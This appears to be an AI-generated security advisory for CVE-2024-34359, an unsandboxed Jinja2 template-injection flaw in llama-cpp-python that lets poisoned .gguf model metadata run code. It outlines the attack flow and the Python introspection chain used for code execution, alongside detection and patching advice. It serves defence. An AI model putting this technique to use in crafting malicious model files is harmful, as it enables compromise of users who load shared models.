CVE-2024-34359 Overview
CVE-2024-34359 is a Server-Side Template Injection (SSTI) vulnerability affecting llama-cpp-python, the Python bindings for the llama.cpp large language model framework. The vulnerability exists in how the library processes chat templates from .gguf model files, allowing attackers to achieve remote code execution through maliciously crafted model metadata.
The Llama class in llama.py loads chat templates from .gguf file metadata and passes them to Jinja2ChatFormatter.to_chat_handler() without proper sandboxing. This unsandboxed jinja2.Environment allows attackers to inject malicious Jinja2 template code that executes arbitrary commands when the template is rendered during chat interactions.
Critical Impact
Attackers can achieve remote code execution by distributing malicious .gguf model files containing crafted Jinja2 payloads in their metadata. When users load these poisoned models, arbitrary code executes on the host system with the privileges of the running process.
Affected Products
- llama-cpp-python (versions prior to the security patch)
- Applications using llama-cpp-python to load untrusted .gguf model files
- AI/ML pipelines that automatically process user-supplied or third-party model files
Discovery Timeline
- 2024-05-14 - CVE-2024-34359 published to NVD
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2024-34359
Vulnerability Analysis
The vulnerability stems from a fundamental security oversight in how llama-cpp-python handles Jinja2 template processing. The library extracts chat template strings from the metadata section of .gguf model files and processes them through Jinja2's template engine without implementing any sandboxing mechanisms.
Jinja2 templates are powerful and can access Python objects, call methods, and traverse object hierarchies. When an attacker controls the template content, they can craft payloads that escape the template context and execute arbitrary Python code. This is a well-known attack vector that requires careful sandboxing when processing untrusted templates.
The attack surface is particularly concerning in the AI/ML ecosystem where model sharing is common. Users frequently download models from community repositories, model hubs, and third-party sources. A malicious actor could distribute seemingly legitimate .gguf models containing weaponized chat templates.
Root Cause
The root cause is the use of an unsandboxed jinja2.Environment when parsing chat templates from model metadata. The Jinja2ChatFormatter class directly processes template strings without restricting access to dangerous Python objects, built-in functions, or module imports. This violates the security principle of never trusting user-controlled input, especially when that input is interpreted as executable code.
CWE-76 (Improper Neutralization of Equivalent Special Elements) accurately categorizes this vulnerability, as the application fails to properly neutralize Jinja2 template syntax that can be interpreted as code execution commands.
Attack Vector
The attack is network-based and requires user interaction—specifically, a victim must load a malicious .gguf model file. The attack flow proceeds as follows:
- Attacker crafts a .gguf model file with a malicious Jinja2 template embedded in its metadata
- The poisoned model is distributed through model sharing platforms, social engineering, or supply chain compromise
- Victim downloads and loads the model using llama-cpp-python
- During initialization, the Llama class extracts the chat template from metadata
- The template is passed to Jinja2ChatFormatter without sandboxing
- When the chat handler is invoked (during prompt construction), the malicious template renders and executes arbitrary code
Jinja2 SSTI payloads typically leverage Python's object introspection capabilities to access dangerous classes like subprocess.Popen or os.system. A carefully constructed payload can chain through __mro__, __subclasses__, and __globals__ to reach code execution primitives.
For technical details on the vulnerability mechanism and patch implementation, refer to the GitHub Security Advisory GHSA-56xg-wfcc-g829.
Detection Methods for CVE-2024-34359
Indicators of Compromise
- Unusual process spawning from Python processes running llama-cpp-python
- Network connections initiated by model loading processes to unexpected destinations
- Unexpected file system modifications during or after model loading
- Presence of .gguf files with suspiciously large or complex metadata sections
- Error logs showing Jinja2 template rendering failures with unusual template content
Detection Strategies
- Monitor for child processes spawned by Python applications using llama-cpp-python
- Implement file integrity monitoring on directories where model files are stored
- Analyze .gguf model files for suspicious metadata content before loading
- Use behavioral analysis to detect anomalous activity during model initialization
- Deploy endpoint detection and response (EDR) solutions to identify code execution from template engines
Monitoring Recommendations
- Enable verbose logging for llama-cpp-python applications to capture template processing events
- Implement network segmentation for systems that process untrusted model files
- Set up alerts for unexpected outbound connections from AI/ML workloads
- Review model file provenance and implement model signing/verification where possible
How to Mitigate CVE-2024-34359
Immediate Actions Required
- Update llama-cpp-python to the latest patched version immediately
- Audit all .gguf model files currently in use for suspicious metadata
- Restrict model loading to trusted sources only until patching is complete
- Isolate systems running vulnerable versions from production networks
- Review application logs for signs of exploitation
Patch Information
The vulnerability has been addressed in the llama-cpp-python repository. The fix implements proper sandboxing for Jinja2 template processing, preventing access to dangerous Python objects and methods during template rendering.
Apply the security patch by updating to the latest version of llama-cpp-python. The fix is available in commit b454f40a9a1787b2b5659cd2cb00819d983185df. For complete details, refer to the GitHub Security Advisory.
Workarounds
- Only load .gguf models from trusted and verified sources
- Run llama-cpp-python in a sandboxed environment (containers, VMs) with minimal privileges
- Implement network isolation for systems processing untrusted models
- Disable or remove chat template functionality if not required for your use case
- Use application-level firewalls to restrict outbound connections from model processing workloads
# Update llama-cpp-python to the latest patched version
pip install --upgrade llama-cpp-python
# Verify the installed version includes the security fix
pip show llama-cpp-python | grep Version
# Run model processing in an isolated container with minimal privileges
docker run --rm --read-only --network=none -v /path/to/trusted/models:/models:ro llama-container
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


